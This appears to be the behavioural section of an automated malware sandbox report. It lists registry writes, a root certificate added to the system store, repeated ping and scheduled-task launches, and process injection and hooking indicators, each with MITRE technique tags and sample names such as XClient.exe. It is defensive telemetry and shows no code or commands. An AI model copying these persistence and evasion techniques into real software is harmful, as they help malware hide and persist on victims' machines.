Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2584844841-1405471295-1760131749-1000\{C9A3A123-839F-4B23-98F4-7661E6244D98}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

defense_evasion spyware trojan

pid	Process
1036	reg.exe
3704	reg.exe
404	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	c1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	c1.exe

Runs ping.exe 1 TTPs 24 IoCs

Remote System Discovery

T1018

pid	Process
5836	PING.EXE
6556	PING.EXE
1768	PING.EXE
2200	PING.EXE
9448	PING.EXE
4688	PING.EXE
5460	PING.EXE
9020	PING.EXE
8916	PING.EXE
8764	PING.EXE
8212	PING.EXE
6648	PING.EXE
6156	PING.EXE
7740	PING.EXE
7676	PING.EXE
4688	PING.EXE
9512	PING.EXE
5748	PING.EXE
6860	PING.EXE
4908	PING.EXE
6476	PING.EXE
6160	PING.EXE
6696	PING.EXE
6116	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 58 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5080	schtasks.exe
8188	schtasks.exe
8448	schtasks.exe
9272	schtasks.exe
2852	schtasks.exe
5384	schtasks.exe
1200	schtasks.exe
9896	schtasks.exe
6156	schtasks.exe
8768	schtasks.exe
7624	schtasks.exe
8136	schtasks.exe
7284	schtasks.exe
9964	schtasks.exe
10008	schtasks.exe
7668	schtasks.exe
7352	schtasks.exe
6084	schtasks.exe
8008	schtasks.exe
4392	schtasks.exe
3308	schtasks.exe
4112	schtasks.exe
5916	schtasks.exe
7532	schtasks.exe
9136	schtasks.exe
6340	schtasks.exe
7372	schtasks.exe
8940	schtasks.exe
6512	schtasks.exe
3148	schtasks.exe
6484	schtasks.exe
6640	schtasks.exe
6704	schtasks.exe
2424	schtasks.exe
2176	schtasks.exe
7300	schtasks.exe
5364	schtasks.exe
4164	schtasks.exe
8420	schtasks.exe
4088	schtasks.exe
6440	schtasks.exe
7692	schtasks.exe
5284	schtasks.exe
6932	schtasks.exe
1288	schtasks.exe
5676	schtasks.exe
5948	schtasks.exe
5596	schtasks.exe
8100	schtasks.exe
7480	schtasks.exe
10040	schtasks.exe
9952	schtasks.exe
4068	schtasks.exe
4552	schtasks.exe
1292	schtasks.exe
6432	schtasks.exe
7792	schtasks.exe
3848	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3124	chrome.exe
3124	chrome.exe
4788	msedge.exe
4788	msedge.exe
2104	msedge.exe
2104	msedge.exe
5024	msedge.exe
5024	msedge.exe
2524	identity_helper.exe
2524	identity_helper.exe
5004	chrome.exe
5004	chrome.exe
5004	chrome.exe
5004	chrome.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
2976	Syncing.exe
4904	powershell.exe
4904	powershell.exe
4904	powershell.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
4332	powershell.exe
4332	powershell.exe
4332	powershell.exe
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe
2232	XClient.exe
2232	XClient.exe
1504	powershell.exe
1504	powershell.exe
1504	powershell.exe
2204	powershell.exe
2204	powershell.exe
2204	powershell.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
2892	powershell.exe
2892	powershell.exe
2892	powershell.exe
1204	main.exe
1204	main.exe
1204	main.exe
1204	main.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
4032	chrome.exe
2592	chrome.exe
1304	Server.exe
1916	chrome.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3704	76y5trfed675ytg.exe
3764	iexplore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2764	7zFM.exe
Token: 35	2764	7zFM.exe
Token: SeSecurityPrivilege	2764	7zFM.exe
Token: SeDebugPrivilege	3048	firefox.exe
Token: SeDebugPrivilege	3048	firefox.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2764	7zFM.exe
2764	7zFM.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe

Suspicious use of SendNotifyMessage 28 IoCs

pid	Process
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
4788	msedge.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe

Suspicious use of SetWindowsHookEx 53 IoCs

pid	Process
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
3048	firefox.exe
4472	foggy-mountains.exe
3564	chrome.exe
3564	chrome.exe
3564	chrome.exe
3056	chrome.exe
1272	c1.exe
4564	chrome.exe
4564	chrome.exe
4564	chrome.exe
4032	chrome.exe
4032	chrome.exe
4032	chrome.exe
2648	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
2232	XClient.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
2592	chrome.exe
4868	kg.exe
1900	svchost.exe
2592	chrome.exe
2592	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
1916	chrome.exe
2832	NOTallowedtocrypt.exe
3704	76y5trfed675ytg.exe
3764	iexplore.exe
3764	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 568 wrote to memory of 3048	568	firefox.exe	81
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 4712	3048	firefox.exe	82
PID 3048 wrote to memory of 1744	3048	firefox.exe	83
PID 3048 wrote to memory of 1744	3048	firefox.exe	83
PID 3048 wrote to memory of 1744	3048	firefox.exe	83
PID 3048 wrote to memory of 1744	3048	firefox.exe	83
